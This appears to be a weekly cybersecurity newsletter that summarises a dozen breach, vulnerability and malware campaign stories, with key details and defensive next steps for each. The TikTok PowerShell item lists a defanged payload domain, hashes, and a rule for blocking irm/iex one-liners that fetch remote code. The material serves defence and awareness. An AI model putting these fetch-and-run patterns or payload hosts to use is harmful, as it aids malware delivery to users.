Same stuff different week. There were some wins on the law enforcement side but the adversaries aren’t doing too “bad” either.
Supply chain attacks in VS Code have gotten to a place where we need to include a review for VS Code extensions, in addition to all code changes.

Also, included two longer food-for-thought style long form articles at the very end. I found both very interesting and they stayed with me for a while after reading them.

1. Nation-State Hackers Breach F5 BIG-IP Development Environment, Steal Source Code and Vulnerability Data

F5 Networks confirmed that a "highly sophisticated nation-state threat actor" maintained long-term access to its BIG-IP product development and engineering knowledge platforms, exfiltrating portions of source code, undisclosed vulnerability details, and limited customer configuration data. 

F5’s BIG-IP platform underpins application delivery and security for many large enterprises and government systems. It’s widely used as a load balancer and reverse proxy, managing traffic and protecting critical web applications.

The breach elevates risk for targeted attacks against unpatched F5 devices and has prompted CISA to mandate immediate inventory and patching for federal agencies.

Key Details

• Intrusion discovered in August 2025; public disclosure occurred Oct. 15 under DOJ guidance.
• Stolen files include segments of BIG-IP source code and vulnerability information still under mitigation.
• CISA issued Emergency Directive ED 26-01, requiring federal civilian agencies to inventory and update BIG-IP devices by Oct. 22.

Next Steps

• Apply the latest patches for BIG-IP, F5OS, BIG-IP Next, BIG-IQ, and APM clients immediately.
• Consider replacing BIG-IP services as bad actors now have previously undisclosed vulnerabilities and the source code give them opportunity to create new exploits more easily.

Read more at: Dark Reading, The Hacker News, CSO Online, Cybersecurity News, CyberScoop, Cybersecurity News, Cybersecurity News

2. Microsoft Revokes 200+ Abused Azure Code-Signing Certificates in Rhysida Ransomware Campaign

Microsoft disrupted a Rhysida ransomware operation by revoking over 200 Azure Trusted Signing certificates that Vanilla Tempest used to sign fake Microsoft Teams installers with the Oyster backdoor. By abusing legitimate certificates and SEO-poisoned domains, attackers bypassed signature-based defenses and drove victims to malicious downloads.

Key Details

• Vanilla Tempest (aka Vice Society) hosted malicious MSTeamsSetup.exe on SEO poisoned domains
• Fake installers dropped a loader that installed Oyster backdoor before deploying Rhysida ransomware.
• Attackers also acquired code-signing certificates from SSL.com, DigiCert and GlobalSign.
• Azure Trusted Signing requires a Microsoft Entra tenant and a three-year organizational history, raising vetting concerns.

Read more at Dark Reading

3. Critical ASP.NET Core HTTP Request Smuggling Flaw Earns Record-high 9.9 CVSS

Microsoft has released patches for CVE-2025-55315, a critical HTTP request smuggling bug in the Kestrel server component of ASP.NET Core that earned a 9.9 severity rating—the highest ever for the framework. Authenticated attackers could embed malicious requests to bypass authentication, skip CSRF checks, or perform injection attacks, though actual impact depends on application logic and deployment.

Key Details

• All supported ASP.NET Core versions (8, 9, 10) and legacy 2.3 are affected.
• Attackers need only authenticated access to smuggle a second HTTP request past security checks.
• Microsoft’s 9.9 score reflects worst-case security feature bypass “changing scope,” not typical deployments.

Next Steps

• Upgrade to .NET 8.0.21/.NET 9.0.10/.NET 10.0.0-rc.2 runtimes or Kestrel.Core 2.3.6.
• Review custom request-handling code for unchecked header parsing.

Read more at CSO Online, Bleeping Computer

4. Attackers Exploit Cisco SNMP Flaw to Deploy Fileless Linux Rootkits on Legacy Switches

A new "Operation Zero Disco" campaign leverages CVE-2025-20352, an SNMP stack-overflow in Cisco IOS and IOS XE, to achieve remote code execution and install fileless Linux rootkits on unpatched 9400, 9300 and 3750G series switches. 

The rootkits hook into the IOS daemon, set a universal “disco” password, toggle or delete logs, reset timestamps and open a UDP-based backdoor, enabling persistent, stealthy access and potential lateral movement. 

Key Details

• Targets Cisco 9400, 9300 and legacy 3750G switches running older Linux stacks without EDR.
• Rootkit hooks into IOSd memory, creates universal password containing “disco,” hides configuration changes.

Next Steps

• Apply Cisco’s October 2025 patches for CVE-2025-20352.
• Restrict SNMP management-plane reachability and enforce ACLs.

Read more at The Hacker News, CSO Online, BleepingComputer, Trend Micro

5. North Korean Hackers Adopt EtherHiding to Deliver Malware via Smart Contracts

A DPRK-linked group (UNC5342) has begun embedding malicious JavaScript loaders inside Ethereum and BNB Smart Chain contracts using the EtherHiding technique. Marking the first state-sponsored use of blockchain as a resilient C2 and malware hosting platform. 

The multi-stage attack chain—deployed through fake recruiting lures—fetches and updates payloads on-chain to steal developer data and siphon cryptocurrency without relying on takedown-prone servers.

Key Details

• UNC5342 targets developers via LinkedIn recruitment scams, moving chats to Telegram/Discord.
• Attack stages: initial npm downloader → BeaverTail stealer → JADESNOW loader → InvisibleFerret backdoor.
• Smart contracts on Ethereum and BSC store encrypted payloads (Base64/XOR)
  

Read more at The Hacker News

6. Europol-led Bust Disrupts SIM-Card Rental Network Behind €5 Million in Telecom Fraud

International law enforcement dismantled a network selling phone numbers from over 80 countries to scammers, seizing 40,000 SIM cards, 1,200 SIM boxes and five servers.  

Investigators linked the service to more than 3,000 fraud cases and over €5 million in losses, while criminals used the infrastructure to create 49 million fake online accounts for phishing, extortion and other crimes.  

Key Details

• Five suspects arrested in Latvia, including the alleged organizer.
• Two seized websites (gogetsms.com, apisim.com) powered a global SIM-provisioning platform.
• Fraud concentrated in Austria and Latvia, with combined losses exceeding €5 million.
• Service enabled creation of over 49 million fake accounts used in phishing, investment scams and CSAM distribution.

Read more at The Record, Europol

7. New Pixnapping Attack Steals 2FA Codes and Screen Data on Android

Researchers have demonstrated “pixnapping,” a side-channel exploit that lets a malicious Android app steal on-screen secrets from Google Authenticator 2FA codes to Signal messages, by capturing and reconstructing pixels in under 30 seconds. 
The vulnerability (CVE-2025-48561) affects modern devices running Android 13–16, including Google Pixel and Samsung Galaxy models, and Google’s September patch was bypassed; a fuller fix is due in December’s security bulletin. 

Key Details

• Pixnapping abuses Android intents and semi-transparent activities to force victim app pixels into the rendering pipeline and infer their color via GPU timing.
• Demonstrated recovery: 2FA codes from Google Authenticator in under 30 seconds; messages from Signal, Gmail, Venmo and Maps timelines also exfiltrated.
• Affected devices tested: Pixel 6-9 and Galaxy S25 on Android 13-16; underlying API and hardware side-channel exist on most modern Android phones.
• Google’s September patch (partial mitigation) was circumvented; full mitigation slated for December Android security bulletin.

Next Steps

• Enroll devices in beta December patch and validate overlay fixes.

Read more at Dark Reading, BleepingComputer

8. Microsoft Reports 32% Rise in Identity Attacks Fueled by Stolen Passwords

Microsoft’s H1 2025 Digital Defense Report shows identity-based attacks surged 32%, with over 97% relying on password guessing, leaks and social-engineering scams. Compromised credentials now drive account takeovers, data theft and ransomware, highlighting gaps in password hygiene and help-desk controls.

Key Details

• 97% of identity attacks are password-based, up 32% in six months.
• Infostealer malware and help-desk scams (vishing, Quick Assist) are on the rise.
• Most targeted: IT companies and national/local government agencies.

Next Steps

• Enforce MFA and conditional access on all user accounts.
• Harden help-desk workflows:

Read more at The Record

9. TikTok-Based Campaign Uses Self-Compiling PowerShell Malware for AuroStealer Deployment

Cybercriminals are tricking TikTok users into running a one-line PowerShell command under the guise of free software activation, which delivers a multi-stage malware chain culminating in AuroStealer data theft. The campaign employs scheduled-task persistence and on-the-fly C# compilation to inject shellcode in memory and evade detection. 

Key Details

• Victims are instructed to run a malicious PowerShell command to fetch a first-stage PowerShell script (SHA256: 6D897B…C6B23,17/63 VT hits).
• The initial payload downloads updater.exe from file-epq [.] pages [.] dev, identified as AuroStealer targeting credentials and system data.
• Persistence via scheduled tasks named like “MicrosoftEdgeUpdateTaskMachineCore” ensures execution at user logon.
  
• Third stage (source.exe, SHA256: db57e4…67011) compiles and runs C# code at runtime via csc.exe to perform in-memory shellcode injection.

Next Steps

• Block or monitor PowerShell one-liners invoking irm/iex from unknown domains
• Audit new scheduled tasks matching “*UpdateTaskMachine*” for unauthorized entries

Read more at CybersecurityNews

10. TigerJack Campaign Uses Malicious VS Code Extensions to Steal Code, Mine Crypto, and Persist Undetected

Threat actor "TigerJack" has published at least 11 malicious Visual Studio Code and OpenVSX extensions that quietly exfiltrate source code, deploy cryptominers, and fetch remote JavaScript for backdoor control. 

Over 17,000 downloads of popular packages like "C++ Playground" and "HTTP Format".

Key Details

• 11 extensions across three publisher accounts (ab-498, 498, 498-00).
• “C++ Playground” and “HTTP Format” amassed 17,000+ downloads before VS Code removal.
• Extensions poll hardcoded endpoints every 20 minutes to execute new payloads.
• OpenVSX marketplace hosts active variants due to minimal malware scanning.

Next Steps

• Inventory and remove unverified VS Code/OpenVSX extensions
• Require peer review and sandbox testing for new developer tools.

Read more at CSO Online

Food for Thought Long Form Recommendations

11. Enterprises’ Phishing Training Proves Ineffective, Calls for New Behavioral Approaches

Despite widespread annual and embedded phishing exercises, recent research shows no measurable drop in employees’ click-through rates or susceptibility. Low engagement—up to half of simulated phishing trainings go uncompleted—and poor information retention mean organizations remain exposed. Phishing training must shift from checkbox compliance to behavior-driven, context-aware interventions and back them with metrics and technical controls.

Key Details

• Phishing causes 15% of data breaches, per IBM.
• Study of ~20,000 UCSD Health staff found no difference in failure rates post-training.
• 37–51% of embedded phishing trainings see zero engagement.
• PC users click risky links more often than mobile users, suggesting device impacts behavior.

Next Steps

• Track real‐world phishing click-rates by cohort and device.
• Introduce gamified, scenario-based exercises with small rewards.
• Augment training with two-factor authentication and automated phish detection.

Read more at CSO Online

12. The Truth About Consistent Chinese Espionage in the UK

UK officials uncovered a Chinese-sponsored breach that accessed “official-sensitive” and “secret” government data via a critical data exchange hub for at least ten years after its sale to a China-aligned entity. Ministers even considered razing the facility to eliminate hidden backdoors before choosing a targeted incident response and patching approach.  The episode highlights the imperative for CISOs to enforce stringent supply-chain oversight, continuous threat hunting, and robust controls over edge devices and VPN access.

Key Details

• Breaches spanned low- and mid-classification networks; no “top secret” data was exfiltrated.
• Then-PM Boris Johnson commissioned a classified review of Chinese digital surveillance and cyber threats.
• Experts suggest the initial compromise likely exploited a VPN vulnerability, followed by privilege escalation.
• State-linked APTs may employ Operational Relay Boxes to mask long-term presence and evade detection.

Read more at The Spectator

Subscribe

Subscribe to receive this weekly cybersecurity news summary to your inbox every Monday.